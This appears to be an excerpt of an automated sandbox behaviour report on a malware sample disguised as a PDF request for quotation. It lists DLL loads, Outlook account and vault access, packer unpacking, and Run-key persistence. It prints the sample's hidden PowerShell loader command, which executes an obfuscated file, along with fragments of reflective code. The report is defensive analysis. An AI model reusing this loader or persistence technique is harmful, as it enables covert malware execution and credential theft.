            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: pstorec.dll
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: msasn1.dll
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: msasn1.dll
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: msasn1.dll
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
            Source: RFQ24060084#U00b7pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2128067857.0000000008CE8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000002.00000002.2125069144.0000000007BED000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2116134547.00000000034D1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.2116134547.00000000034D1000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeUnpacked PE file: 17.2.Fatherhoods.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeUnpacked PE file: 18.2.Fatherhoods.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeUnpacked PE file: 19.2.Fatherhoods.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeUnpacked PE file: 20.2.Fatherhoods.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeUnpacked PE file: 21.2.Fatherhoods.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeUnpacked PE file: 22.2.Fatherhoods.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: Yara matchFile source: 00000002.00000002.2128913387.000000000BF76000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Supersincerity $Fyrreskovene $printerdisketter), (Konverteringsplanen @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Mesorrhiny = [AppDomain]::CurrentDoma
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Surkaal)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Kondenseringerne, $false).DefineType($Amnestiet,
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Diffusibleness=Get-Content 'C:\Users\user\AppData\Local\kilns\Unobtainably\Gyldigheden146.Aga';$Bimana=$Diffusibleness.SubString(14599,3);.$Bimana($Diffusibleness)"
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Diffusibleness=Get-Content 'C:\Users\user\AppData\Local\kilns\Unobtainably\Gyldigheden146.Aga';$Bimana=$Diffusibleness.SubString(14599,3);.$Bimana($Diffusibleness)"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,17_2_004044A4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_03681BF9 push eax; iretd 2_2_03681C49
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07C31EF1 push ds; ret 2_2_07C31EFE
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07C30EFD push cs; ret 2_2_07C30F06
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07C35943 push edx; ret 2_2_07C35946
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07C35934 push eax; ret 2_2_07C3593A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0963B72C push edx; iretd 2_2_0963B72D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0963AC64 push ds; ret 2_2_0963AC66
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0963A824 push FFFFFF81h; retf 2_2_0963A82B
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C306C3 push cs; ret 7_2_22C306CA
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C322D8 push edi; retn 0022h7_2_22C322DA
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C322F8 push edi; retn 0022h7_2_22C322FA
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C30693 push cs; ret 7_2_22C306AA
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C32299 push esp; retn 0022h7_2_22C3229A
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C306AB push cs; ret 7_2_22C306B2
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C306B3 push cs; ret 7_2_22C306BA
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C306BB push cs; ret 7_2_22C306C2
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C3066B push cs; ret 7_2_22C30672
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C30673 push cs; ret 7_2_22C30692
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C32279 push ecx; retn 0022h7_2_22C3227A
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C31E0F push ds; ret 7_2_22C31E12
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C3061B push cs; ret 7_2_22C3062A
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C31E2C push ds; ret 7_2_22C31E32
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C3063B push cs; ret 7_2_22C3064A
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C2FFCF push es; ret 7_2_22C2FFD2
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C2FFD3 push es; ret 7_2_22C2FFDA
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C2FFDB push es; ret 7_2_22C2FFE2
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C2DBA1 push ebx; retn 0022h7_2_22C2DBA2
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C2FFB1 push es; ret 7_2_22C2FFC2
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C22806 push ecx; ret 7_2_22C22819
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C2DC04 push edx; retn 0022h7_2_22C2DC0A
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C31DFB push ds; ret 7_2_22C31DFE

            Persistence and Installation Behavior

            barindex
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeJump to dropped file
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsjD34C.tmp\BgImage.dllJump to dropped file
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsjD34C.tmp\nsDialogs.dllJump to dropped file
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsjD34C.tmp\UserInfo.dllJump to dropped file
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\alfanumerisk.iniJump to behavior
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PreoccupantJump to behavior
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PreoccupantJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 18_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,18_2_004047CB
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
